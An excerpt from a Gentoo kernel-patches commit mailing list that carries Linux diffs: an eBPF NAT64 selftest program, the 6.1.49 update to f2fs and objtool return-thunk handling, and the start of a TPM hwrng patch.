+-	// This takes care of updating the skb->csum field for a CHECKSUM_COMPLETE packet.
+-	// In such a case, skb->csum is a 16-bit one's complement sum of the entire payload,
+-	// thus we need to subtract out the ipv4 header's sum, and add in the ipv6 header's sum.
+-	// However, we've already verified the ipv4 checksum is correct and thus 0.
+-	// Thus we only need to add the ipv6 header's sum.
+-	//
+-	// bpf_csum_update() always succeeds if the skb is CHECKSUM_COMPLETE and returns an error
+-	// (-ENOTSUPP) if it isn't.  So we just ignore the return code (see above for more details).
+-	bpf_csum_update(skb, sum6);
+-
+-	// bpf_skb_change_proto() invalidates all pointers - reload them.
+-	data = (void *)(long)skb->data;
+-	data_end = (void *)(long)skb->data_end;
+-
+-	// I cannot think of any valid way for this error condition to trigger, however I do
+-	// believe the explicit check is required to keep the in kernel ebpf verifier happy.
+-	if (data + l2_header_size + sizeof(ip6) > data_end)
+-		return TC_ACT_SHOT;
+-
+-	struct ethhdr *new_eth = data;
+-
+-	// Copy over the updated ethernet header
+-	*new_eth = eth2;
+-	// Copy over the new ipv4 header.
+-	*(struct ipv6hdr *)(new_eth + 1) = ip6;
+-	return TC_ACT_OK;
+-}
+-
+-char _license[] SEC("license") = ("GPL");
+diff --git a/tools/testing/selftests/net/nat6to4.c b/tools/testing/selftests/net/nat6to4.c
+new file mode 100644
+index 0000000000000..ac54c36b25fc8
+--- /dev/null
++++ b/tools/testing/selftests/net/nat6to4.c
+@@ -0,0 +1,285 @@
++// SPDX-License-Identifier: GPL-2.0-only
++/*
++ * This code is taken from the Android Open Source Project and the author
++ * (Maciej Żenczykowski) has gave permission to relicense it under the
++ * GPLv2. Therefore this program is free software;
++ * You can redistribute it and/or modify it under the terms of the GNU
++ * General Public License version 2 as published by the Free Software
++ * Foundation
++
++ * The original headers, including the original license headers, are
++ * included below for completeness.
++ *
++ * Copyright (C) 2019 The Android Open Source Project
++ *
++ * Licensed under the Apache License, Version 2.0 (the "License");
++ * you may not use this file except in compliance with the License.
++ * You may obtain a copy of the License at
++ *
++ *      http://www.apache.org/licenses/LICENSE-2.0
++ *
++ * Unless required by applicable law or agreed to in writing, software
++ * distributed under the License is distributed on an "AS IS" BASIS,
++ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
++ * See the License for the specific language governing permissions and
++ * limitations under the License.
++ */
++#include <linux/bpf.h>
++#include <linux/if.h>
++#include <linux/if_ether.h>
++#include <linux/if_packet.h>
++#include <linux/in.h>
++#include <linux/in6.h>
++#include <linux/ip.h>
++#include <linux/ipv6.h>
++#include <linux/pkt_cls.h>
++#include <linux/swab.h>
++#include <stdbool.h>
++#include <stdint.h>
++
++
++#include <linux/udp.h>
++
++#include <bpf/bpf_helpers.h>
++#include <bpf/bpf_endian.h>
++
++#define IP_DF 0x4000  // Flag: "Don't Fragment"
++
++SEC("schedcls/ingress6/nat_6")
++int sched_cls_ingress6_nat_6_prog(struct __sk_buff *skb)
++{
++	const int l2_header_size =  sizeof(struct ethhdr);
++	void *data = (void *)(long)skb->data;
++	const void *data_end = (void *)(long)skb->data_end;
++	const struct ethhdr * const eth = data;  // used iff is_ethernet
++	const struct ipv6hdr * const ip6 =  (void *)(eth + 1);
++
++	// Require ethernet dst mac address to be our unicast address.
++	if  (skb->pkt_type != PACKET_HOST)
++		return TC_ACT_OK;
++
++	// Must be meta-ethernet IPv6 frame
++	if (skb->protocol != bpf_htons(ETH_P_IPV6))
++		return TC_ACT_OK;
++
++	// Must have (ethernet and) ipv6 header
++	if (data + l2_header_size + sizeof(*ip6) > data_end)
++		return TC_ACT_OK;
++
++	// Ethertype - if present - must be IPv6
++	if (eth->h_proto != bpf_htons(ETH_P_IPV6))
++		return TC_ACT_OK;
++
++	// IP version must be 6
++	if (ip6->version != 6)
++		return TC_ACT_OK;
++	// Maximum IPv6 payload length that can be translated to IPv4
++	if (bpf_ntohs(ip6->payload_len) > 0xFFFF - sizeof(struct iphdr))
++		return TC_ACT_OK;
++	switch (ip6->nexthdr) {
++	case IPPROTO_TCP:  // For TCP & UDP the checksum neutrality of the chosen IPv6
++	case IPPROTO_UDP:  // address means there is no need to update their checksums.
++	case IPPROTO_GRE:  // We do not need to bother looking at GRE/ESP headers,
++	case IPPROTO_ESP:  // since there is never a checksum to update.
++		break;
++	default:  // do not know how to handle anything else
++		return TC_ACT_OK;
++	}
++
++	struct ethhdr eth2;  // used iff is_ethernet
++
++	eth2 = *eth;                     // Copy over the ethernet header (src/dst mac)
++	eth2.h_proto = bpf_htons(ETH_P_IP);  // But replace the ethertype
++
++	struct iphdr ip = {
++		.version = 4,                                                      // u4
++		.ihl = sizeof(struct iphdr) / sizeof(__u32),                       // u4
++		.tos = (ip6->priority << 4) + (ip6->flow_lbl[0] >> 4),             // u8
++		.tot_len = bpf_htons(bpf_ntohs(ip6->payload_len) + sizeof(struct iphdr)),  // u16
++		.id = 0,                                                           // u16
++		.frag_off = bpf_htons(IP_DF),                                          // u16
++		.ttl = ip6->hop_limit,                                             // u8
++		.protocol = ip6->nexthdr,                                          // u8
++		.check = 0,                                                        // u16
++		.saddr = 0x0201a8c0,                            // u32
++		.daddr = 0x0101a8c0,                                         // u32
++	};
++
++	// Calculate the IPv4 one's complement checksum of the IPv4 header.
++	__wsum sum4 = 0;
++
++	for (int i = 0; i < sizeof(ip) / sizeof(__u16); ++i)
++		sum4 += ((__u16 *)&ip)[i];
++
++	// Note that sum4 is guaranteed to be non-zero by virtue of ip.version == 4
++	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse u32 into range 1 .. 0x1FFFE
++	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse any potential carry into u16
++	ip.check = (__u16)~sum4;                // sum4 cannot be zero, so this is never 0xFFFF
++
++	// Calculate the *negative* IPv6 16-bit one's complement checksum of the IPv6 header.
++	__wsum sum6 = 0;
++	// We'll end up with a non-zero sum due to ip6->version == 6 (which has '0' bits)
++	for (int i = 0; i < sizeof(*ip6) / sizeof(__u16); ++i)
++		sum6 += ~((__u16 *)ip6)[i];  // note the bitwise negation
++
++	// Note that there is no L4 checksum update: we are relying on the checksum neutrality
++	// of the ipv6 address chosen by netd's ClatdController.
++
++	// Packet mutations begin - point of no return, but if this first modification fails
++	// the packet is probably still pristine, so let clatd handle it.
++	if (bpf_skb_change_proto(skb, bpf_htons(ETH_P_IP), 0))
++		return TC_ACT_OK;
++	bpf_csum_update(skb, sum6);
++
++	data = (void *)(long)skb->data;
++	data_end = (void *)(long)skb->data_end;
++	if (data + l2_header_size + sizeof(struct iphdr) > data_end)
++		return TC_ACT_SHOT;
++
++	struct ethhdr *new_eth = data;
++
++	// Copy over the updated ethernet header
++	*new_eth = eth2;
++
++	// Copy over the new ipv4 header.
++	*(struct iphdr *)(new_eth + 1) = ip;
++	return bpf_redirect(skb->ifindex, BPF_F_INGRESS);
++}
++
++SEC("schedcls/egress4/snat4")
++int sched_cls_egress4_snat4_prog(struct __sk_buff *skb)
++{
++	const int l2_header_size =  sizeof(struct ethhdr);
++	void *data = (void *)(long)skb->data;
++	const void *data_end = (void *)(long)skb->data_end;
++	const struct ethhdr *const eth = data;  // used iff is_ethernet
++	const struct iphdr *const ip4 = (void *)(eth + 1);
++
++	// Must be meta-ethernet IPv4 frame
++	if (skb->protocol != bpf_htons(ETH_P_IP))
++		return TC_ACT_OK;
++
++	// Must have ipv4 header
++	if (data + l2_header_size + sizeof(struct ipv6hdr) > data_end)
++		return TC_ACT_OK;
++
++	// Ethertype - if present - must be IPv4
++	if (eth->h_proto != bpf_htons(ETH_P_IP))
++		return TC_ACT_OK;
++
++	// IP version must be 4
++	if (ip4->version != 4)
++		return TC_ACT_OK;
++
++	// We cannot handle IP options, just standard 20 byte == 5 dword minimal IPv4 header
++	if (ip4->ihl != 5)
++		return TC_ACT_OK;
++
++	// Maximum IPv6 payload length that can be translated to IPv4
++	if (bpf_htons(ip4->tot_len) > 0xFFFF - sizeof(struct ipv6hdr))
++		return TC_ACT_OK;
++
++	// Calculate the IPv4 one's complement checksum of the IPv4 header.
++	__wsum sum4 = 0;
++
++	for (int i = 0; i < sizeof(*ip4) / sizeof(__u16); ++i)
++		sum4 += ((__u16 *)ip4)[i];
++
++	// Note that sum4 is guaranteed to be non-zero by virtue of ip4->version == 4
++	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse u32 into range 1 .. 0x1FFFE
++	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse any potential carry into u16
++	// for a correct checksum we should get *a* zero, but sum4 must be positive, ie 0xFFFF
++	if (sum4 != 0xFFFF)
++		return TC_ACT_OK;
++
++	// Minimum IPv4 total length is the size of the header
++	if (bpf_ntohs(ip4->tot_len) < sizeof(*ip4))
++		return TC_ACT_OK;
++
++	// We are incapable of dealing with IPv4 fragments
++	if (ip4->frag_off & ~bpf_htons(IP_DF))
++		return TC_ACT_OK;
++
++	switch (ip4->protocol) {
++	case IPPROTO_TCP:  // For TCP & UDP the checksum neutrality of the chosen IPv6
++	case IPPROTO_GRE:  // address means there is no need to update their checksums.
++	case IPPROTO_ESP:  // We do not need to bother looking at GRE/ESP headers,
++		break;         // since there is never a checksum to update.
++
++	case IPPROTO_UDP:  // See above comment, but must also have UDP header...
++		if (data + sizeof(*ip4) + sizeof(struct udphdr) > data_end)
++			return TC_ACT_OK;
++		const struct udphdr *uh = (const struct udphdr *)(ip4 + 1);
++		// If IPv4/UDP checksum is 0 then fallback to clatd so it can calculate the
++		// checksum.  Otherwise the network or more likely the NAT64 gateway might
++		// drop the packet because in most cases IPv6/UDP packets with a zero checksum
++		// are invalid. See RFC 6935.  TODO: calculate checksum via bpf_csum_diff()
++		if (!uh->check)
++			return TC_ACT_OK;
++		break;
++
++	default:  // do not know how to handle anything else
++		return TC_ACT_OK;
++	}
++	struct ethhdr eth2;  // used iff is_ethernet
++
++	eth2 = *eth;                     // Copy over the ethernet header (src/dst mac)
++	eth2.h_proto = bpf_htons(ETH_P_IPV6);  // But replace the ethertype
++
++	struct ipv6hdr ip6 = {
++		.version = 6,                                    // __u8:4
++		.priority = ip4->tos >> 4,                       // __u8:4
++		.flow_lbl = {(ip4->tos & 0xF) << 4, 0, 0},       // __u8[3]
++		.payload_len = bpf_htons(bpf_ntohs(ip4->tot_len) - 20),  // __be16
++		.nexthdr = ip4->protocol,                        // __u8
++		.hop_limit = ip4->ttl,                           // __u8
++	};
++	ip6.saddr.in6_u.u6_addr32[0] = bpf_htonl(0x20010db8);
++	ip6.saddr.in6_u.u6_addr32[1] = 0;
++	ip6.saddr.in6_u.u6_addr32[2] = 0;
++	ip6.saddr.in6_u.u6_addr32[3] = bpf_htonl(1);
++	ip6.daddr.in6_u.u6_addr32[0] = bpf_htonl(0x20010db8);
++	ip6.daddr.in6_u.u6_addr32[1] = 0;
++	ip6.daddr.in6_u.u6_addr32[2] = 0;
++	ip6.daddr.in6_u.u6_addr32[3] = bpf_htonl(2);
++
++	// Calculate the IPv6 16-bit one's complement checksum of the IPv6 header.
++	__wsum sum6 = 0;
++	// We'll end up with a non-zero sum due to ip6.version == 6
++	for (int i = 0; i < sizeof(ip6) / sizeof(__u16); ++i)
++		sum6 += ((__u16 *)&ip6)[i];
++
++	// Packet mutations begin - point of no return, but if this first modification fails
++	// the packet is probably still pristine, so let clatd handle it.
++	if (bpf_skb_change_proto(skb, bpf_htons(ETH_P_IPV6), 0))
++		return TC_ACT_OK;
++
++	// This takes care of updating the skb->csum field for a CHECKSUM_COMPLETE packet.
++	// In such a case, skb->csum is a 16-bit one's complement sum of the entire payload,
++	// thus we need to subtract out the ipv4 header's sum, and add in the ipv6 header's sum.
++	// However, we've already verified the ipv4 checksum is correct and thus 0.
++	// Thus we only need to add the ipv6 header's sum.
++	//
++	// bpf_csum_update() always succeeds if the skb is CHECKSUM_COMPLETE and returns an error
++	// (-ENOTSUPP) if it isn't.  So we just ignore the return code (see above for more details).
++	bpf_csum_update(skb, sum6);
++
++	// bpf_skb_change_proto() invalidates all pointers - reload them.
++	data = (void *)(long)skb->data;
++	data_end = (void *)(long)skb->data_end;
++
++	// I cannot think of any valid way for this error condition to trigger, however I do
++	// believe the explicit check is required to keep the in kernel ebpf verifier happy.
++	if (data + l2_header_size + sizeof(ip6) > data_end)
++		return TC_ACT_SHOT;
++
++	struct ethhdr *new_eth = data;
++
++	// Copy over the updated ethernet header
++	*new_eth = eth2;
++	// Copy over the new ipv4 header.
++	*(struct ipv6hdr *)(new_eth + 1) = ip6;
++	return TC_ACT_OK;
++}
++
++char _license[] SEC("license") = ("GPL");
+diff --git a/tools/testing/selftests/net/udpgro_frglist.sh b/tools/testing/selftests/net/udpgro_frglist.sh
+index c9c4b9d658390..0a6359bed0b92 100755
+--- a/tools/testing/selftests/net/udpgro_frglist.sh
++++ b/tools/testing/selftests/net/udpgro_frglist.sh
+@@ -40,8 +40,8 @@ run_one() {
+ 
+ 	ip -n "${PEER_NS}" link set veth1 xdp object ${BPF_FILE} section xdp
+ 	tc -n "${PEER_NS}" qdisc add dev veth1 clsact
+-	tc -n "${PEER_NS}" filter add dev veth1 ingress prio 4 protocol ipv6 bpf object-file ../bpf/nat6to4.o section schedcls/ingress6/nat_6  direct-action
+-	tc -n "${PEER_NS}" filter add dev veth1 egress prio 4 protocol ip bpf object-file ../bpf/nat6to4.o section schedcls/egress4/snat4 direct-action
++	tc -n "${PEER_NS}" filter add dev veth1 ingress prio 4 protocol ipv6 bpf object-file nat6to4.o section schedcls/ingress6/nat_6  direct-action
++	tc -n "${PEER_NS}" filter add dev veth1 egress prio 4 protocol ip bpf object-file nat6to4.o section schedcls/egress4/snat4 direct-action
+         echo ${rx_args}
+ 	ip netns exec "${PEER_NS}" ./udpgso_bench_rx ${rx_args} -r &
+ 
+@@ -88,8 +88,8 @@ if [ ! -f ${BPF_FILE} ]; then
+ 	exit -1
+ fi
+ 
+-if [ ! -f bpf/nat6to4.o ]; then
+-	echo "Missing nat6to4 helper. Build bpfnat6to4.o selftest first"
++if [ ! -f nat6to4.o ]; then
++	echo "Missing nat6to4 helper. Build bpf nat6to4.o selftest first"
+ 	exit -1
+ fi
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-27 21:41 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-27 21:41 UTC (permalink / raw
  To: gentoo-commits

commit:     1d1cf87e8d9001f2eaf9fb98557eead6934e4aaa
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Aug 27 21:41:02 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Aug 27 21:41:02 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1d1cf87e

Linux patch 6.1.49

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1048_linux-6.1.49.patch | 292 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 296 insertions(+)

diff --git a/0000_README b/0000_README
index 0c66344f..6ce2c13b 100644
--- a/0000_README
+++ b/0000_README
@@ -235,6 +235,10 @@ Patch:  1047_linux-6.1.48.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.48
 
+Patch:  1048_linux-6.1.49.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.49
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1048_linux-6.1.49.patch b/1048_linux-6.1.49.patch
new file mode 100644
index 00000000..637a71c4
--- /dev/null
+++ b/1048_linux-6.1.49.patch
@@ -0,0 +1,292 @@
+diff --git a/Makefile b/Makefile
+index 8bb8dd199c552..61ebd54aba899 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 48
++SUBLEVEL = 49
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 78f39a78de29a..4d1e48c676fab 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -3431,6 +3431,7 @@ static inline bool __is_valid_data_blkaddr(block_t blkaddr)
+  * file.c
+  */
+ int f2fs_sync_file(struct file *file, loff_t start, loff_t end, int datasync);
++void f2fs_truncate_data_blocks(struct dnode_of_data *dn);
+ int f2fs_do_truncate_blocks(struct inode *inode, u64 from, bool lock);
+ int f2fs_truncate_blocks(struct inode *inode, u64 from, bool lock);
+ int f2fs_truncate(struct inode *inode);
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 3ce6da4fac9c6..7b94f047cbf79 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -628,6 +628,11 @@ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+ 					 dn->ofs_in_node, nr_free);
+ }
+ 
++void f2fs_truncate_data_blocks(struct dnode_of_data *dn)
++{
++	f2fs_truncate_data_blocks_range(dn, ADDRS_PER_BLOCK(dn->inode));
++}
++
+ static int truncate_partial_data_page(struct inode *inode, u64 from,
+ 								bool cache_only)
+ {
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index 9fe502485930f..a010b4bc36d2c 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -923,7 +923,6 @@ static int truncate_node(struct dnode_of_data *dn)
+ 
+ static int truncate_dnode(struct dnode_of_data *dn)
+ {
+-	struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
+ 	struct page *page;
+ 	int err;
+ 
+@@ -931,25 +930,16 @@ static int truncate_dnode(struct dnode_of_data *dn)
+ 		return 1;
+ 
+ 	/* get direct node */
+-	page = f2fs_get_node_page(sbi, dn->nid);
++	page = f2fs_get_node_page(F2FS_I_SB(dn->inode), dn->nid);
+ 	if (PTR_ERR(page) == -ENOENT)
+ 		return 1;
+ 	else if (IS_ERR(page))
+ 		return PTR_ERR(page);
+ 
+-	if (IS_INODE(page) || ino_of_node(page) != dn->inode->i_ino) {
+-		f2fs_err(sbi, "incorrect node reference, ino: %lu, nid: %u, ino_of_node: %u",
+-				dn->inode->i_ino, dn->nid, ino_of_node(page));
+-		set_sbi_flag(sbi, SBI_NEED_FSCK);
+-		f2fs_handle_error(sbi, ERROR_INVALID_NODE_REFERENCE);
+-		f2fs_put_page(page, 1);
+-		return -EFSCORRUPTED;
+-	}
+-
+ 	/* Make dnode_of_data for parameter */
+ 	dn->node_page = page;
+ 	dn->ofs_in_node = 0;
+-	f2fs_truncate_data_blocks_range(dn, ADDRS_PER_BLOCK(dn->inode));
++	f2fs_truncate_data_blocks(dn);
+ 	err = truncate_node(dn);
+ 	if (err) {
+ 		f2fs_put_page(page, 1);
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index ff47aad636e5b..b6dad389fa144 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -1347,12 +1347,6 @@ default_check:
+ 		return -EINVAL;
+ 	}
+ 
+-	if ((f2fs_sb_has_readonly(sbi) || f2fs_readonly(sbi->sb)) &&
+-		test_opt(sbi, FLUSH_MERGE)) {
+-		f2fs_err(sbi, "FLUSH_MERGE not compatible with readonly mode");
+-		return -EINVAL;
+-	}
+-
+ 	if (f2fs_sb_has_readonly(sbi) && !f2fs_readonly(sbi->sb)) {
+ 		f2fs_err(sbi, "Allow to mount readonly mode only");
+ 		return -EROFS;
+@@ -1939,10 +1933,8 @@ static int f2fs_show_options(struct seq_file *seq, struct dentry *root)
+ 		seq_puts(seq, ",inline_dentry");
+ 	else
+ 		seq_puts(seq, ",noinline_dentry");
+-	if (test_opt(sbi, FLUSH_MERGE))
++	if (!f2fs_readonly(sbi->sb) && test_opt(sbi, FLUSH_MERGE))
+ 		seq_puts(seq, ",flush_merge");
+-	else
+-		seq_puts(seq, ",noflush_merge");
+ 	if (test_opt(sbi, NOBARRIER))
+ 		seq_puts(seq, ",nobarrier");
+ 	if (test_opt(sbi, FASTBOOT))
+@@ -2040,22 +2032,9 @@ static int f2fs_show_options(struct seq_file *seq, struct dentry *root)
+ 	return 0;
+ }
+ 
+-static void default_options(struct f2fs_sb_info *sbi, bool remount)
++static void default_options(struct f2fs_sb_info *sbi)
+ {
+ 	/* init some FS parameters */
+-	if (!remount) {
+-		set_opt(sbi, READ_EXTENT_CACHE);
+-		clear_opt(sbi, DISABLE_CHECKPOINT);
+-
+-		if (f2fs_hw_support_discard(sbi) || f2fs_hw_should_discard(sbi))
+-			set_opt(sbi, DISCARD);
+-
+-		if (f2fs_sb_has_blkzoned(sbi))
+-			F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_SECTION;
+-		else
+-			F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_BLOCK;
+-	}
+-
+ 	if (f2fs_sb_has_readonly(sbi))
+ 		F2FS_OPTION(sbi).active_logs = NR_CURSEG_RO_TYPE;
+ 	else
+@@ -2078,16 +2057,22 @@ static void default_options(struct f2fs_sb_info *sbi, bool remount)
+ 	set_opt(sbi, INLINE_XATTR);
+ 	set_opt(sbi, INLINE_DATA);
+ 	set_opt(sbi, INLINE_DENTRY);
++	set_opt(sbi, READ_EXTENT_CACHE);
+ 	set_opt(sbi, NOHEAP);
++	clear_opt(sbi, DISABLE_CHECKPOINT);
+ 	set_opt(sbi, MERGE_CHECKPOINT);
+ 	F2FS_OPTION(sbi).unusable_cap = 0;
+ 	sbi->sb->s_flags |= SB_LAZYTIME;
+-	if (!f2fs_sb_has_readonly(sbi) && !f2fs_readonly(sbi->sb))
+-		set_opt(sbi, FLUSH_MERGE);
+-	if (f2fs_sb_has_blkzoned(sbi))
++	set_opt(sbi, FLUSH_MERGE);
++	if (f2fs_hw_support_discard(sbi) || f2fs_hw_should_discard(sbi))
++		set_opt(sbi, DISCARD);
++	if (f2fs_sb_has_blkzoned(sbi)) {
+ 		F2FS_OPTION(sbi).fs_mode = FS_MODE_LFS;
+-	else
++		F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_SECTION;
++	} else {
+ 		F2FS_OPTION(sbi).fs_mode = FS_MODE_ADAPTIVE;
++		F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_BLOCK;
++	}
+ 
+ #ifdef CONFIG_F2FS_FS_XATTR
+ 	set_opt(sbi, XATTR_USER);
+@@ -2259,7 +2244,7 @@ static int f2fs_remount(struct super_block *sb, int *flags, char *data)
+ 			clear_sbi_flag(sbi, SBI_NEED_SB_WRITE);
+ 	}
+ 
+-	default_options(sbi, true);
++	default_options(sbi);
+ 
+ 	/* parse mount options */
+ 	err = parse_options(sb, data, true);
+@@ -4156,7 +4141,7 @@ try_onemore:
+ 		sbi->s_chksum_seed = f2fs_chksum(sbi, ~0, raw_super->uuid,
+ 						sizeof(raw_super->uuid));
+ 
+-	default_options(sbi, false);
++	default_options(sbi);
+ 	/* parse mount options */
+ 	options = kstrdup((const char *)data, GFP_KERNEL);
+ 	if (data && !options) {
+diff --git a/include/linux/f2fs_fs.h b/include/linux/f2fs_fs.h
+index 77055b239165a..ee0d75d9a302d 100644
+--- a/include/linux/f2fs_fs.h
++++ b/include/linux/f2fs_fs.h
+@@ -104,7 +104,6 @@ enum f2fs_error {
+ 	ERROR_INCONSISTENT_SIT,
+ 	ERROR_CORRUPTED_VERITY_XATTR,
+ 	ERROR_CORRUPTED_XATTR,
+-	ERROR_INVALID_NODE_REFERENCE,
+ 	ERROR_MAX,
+ };
+ 
+diff --git a/tools/objtool/arch/x86/decode.c b/tools/objtool/arch/x86/decode.c
+index 29c35279c7ed8..1ed49ab4e871f 100644
+--- a/tools/objtool/arch/x86/decode.c
++++ b/tools/objtool/arch/x86/decode.c
+@@ -796,8 +796,11 @@ bool arch_is_retpoline(struct symbol *sym)
+ 
+ bool arch_is_rethunk(struct symbol *sym)
+ {
+-	return !strcmp(sym->name, "__x86_return_thunk") ||
+-	       !strcmp(sym->name, "srso_untrain_ret") ||
+-	       !strcmp(sym->name, "srso_safe_ret") ||
+-	       !strcmp(sym->name, "retbleed_return_thunk");
++	return !strcmp(sym->name, "__x86_return_thunk");
++}
++
++bool arch_is_embedded_insn(struct symbol *sym)
++{
++	return !strcmp(sym->name, "retbleed_return_thunk") ||
++	       !strcmp(sym->name, "srso_safe_ret");
+ }
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index 913bd361c3684..f8008ab31eef0 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -1164,16 +1164,33 @@ static int add_ignore_alternatives(struct objtool_file *file)
+ 	return 0;
+ }
+ 
++/*
++ * Symbols that replace INSN_CALL_DYNAMIC, every (tail) call to such a symbol
++ * will be added to the .retpoline_sites section.
++ */
+ __weak bool arch_is_retpoline(struct symbol *sym)
+ {
+ 	return false;
+ }
+ 
++/*
++ * Symbols that replace INSN_RETURN, every (tail) call to such a symbol
++ * will be added to the .return_sites section.
++ */
+ __weak bool arch_is_rethunk(struct symbol *sym)
+ {
+ 	return false;
+ }
+ 
++/*
++ * Symbols that are embedded inside other instructions, because sometimes crazy
++ * code exists. These are mostly ignored for validation purposes.
++ */
++__weak bool arch_is_embedded_insn(struct symbol *sym)
++{
++	return false;
++}
++
+ #define NEGATIVE_RELOC	((void *)-1L)
+ 
+ static struct reloc *insn_reloc(struct objtool_file *file, struct instruction *insn)
+@@ -1437,7 +1454,7 @@ static int add_jump_destinations(struct objtool_file *file)
+ 			 * middle of another instruction.  Objtool only
+ 			 * knows about the outer instruction.
+ 			 */
+-			if (sym && sym->return_thunk) {
++			if (sym && sym->embedded_insn) {
+ 				add_return_call(file, insn, false);
+ 				continue;
+ 			}
+@@ -2327,6 +2344,9 @@ static int classify_symbols(struct objtool_file *file)
+ 			if (arch_is_rethunk(func))
+ 				func->return_thunk = true;
+ 
++			if (arch_is_embedded_insn(func))
++				func->embedded_insn = true;
++
+ 			if (!strcmp(func->name, "__fentry__"))
+ 				func->fentry = true;
+ 
+diff --git a/tools/objtool/include/objtool/arch.h b/tools/objtool/include/objtool/arch.h
+index beb2f3aa94ffc..861c0c60ac81e 100644
+--- a/tools/objtool/include/objtool/arch.h
++++ b/tools/objtool/include/objtool/arch.h
+@@ -90,6 +90,7 @@ int arch_decode_hint_reg(u8 sp_reg, int *base);
+ 
+ bool arch_is_retpoline(struct symbol *sym);
+ bool arch_is_rethunk(struct symbol *sym);
++bool arch_is_embedded_insn(struct symbol *sym);
+ 
+ int arch_rewrite_retpolines(struct objtool_file *file);
+ 
+diff --git a/tools/objtool/include/objtool/elf.h b/tools/objtool/include/objtool/elf.h
+index 16f4067b82aea..5d4a841fbd311 100644
+--- a/tools/objtool/include/objtool/elf.h
++++ b/tools/objtool/include/objtool/elf.h
+@@ -60,6 +60,7 @@ struct symbol {
+ 	u8 return_thunk      : 1;
+ 	u8 fentry            : 1;
+ 	u8 profiling_func    : 1;
++	u8 embedded_insn     : 1;
+ 	struct list_head pv_target;
+ };
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-26 15:19 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-26 15:19 UTC (permalink / raw
  To: gentoo-commits

commit:     d40e0faac42c6b42986e65605d6e04768e0e8bef
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Aug 26 15:18:16 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Aug 26 15:18:16 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=d40e0faa

tpm: Enable hwrng only for Pluton on AMD CPUs

See: https://bugzilla.kernel.org/show_bug.cgi?id=217804

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 +
 2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch | 90 ++++++++++++++++++++++
 2 files changed, 94 insertions(+)

diff --git a/0000_README b/0000_README
index 40eb5947..0c66344f 100644
--- a/0000_README
+++ b/0000_README
@@ -263,6 +263,10 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
+Patch:  2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch
+From:   https://lore.kernel.org/all/20230822231510.2263255-1-jarkko@kernel.org/
+Desc:   tpm: Enable hwrng only for Pluton on AMD CPUs
+
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch b/2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch
new file mode 100644
index 00000000..932e82ed
--- /dev/null
+++ b/2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch
@@ -0,0 +1,90 @@
+From: Jarkko Sakkinen <jarkko@kernel.org>
+To: linux-integrity@vger.kernel.org
+Cc: Jerry Snitselaar <jsnitsel@redhat.com>,
+	Jarkko Sakkinen <jarkko@kernel.org>,
+	stable@vger.kernel.org, Todd Brandt <todd.e.brandt@intel.com>,
+	Peter Huewe <peterhuewe@gmx.de>, Jason Gunthorpe <jgg@ziepe.ca>,
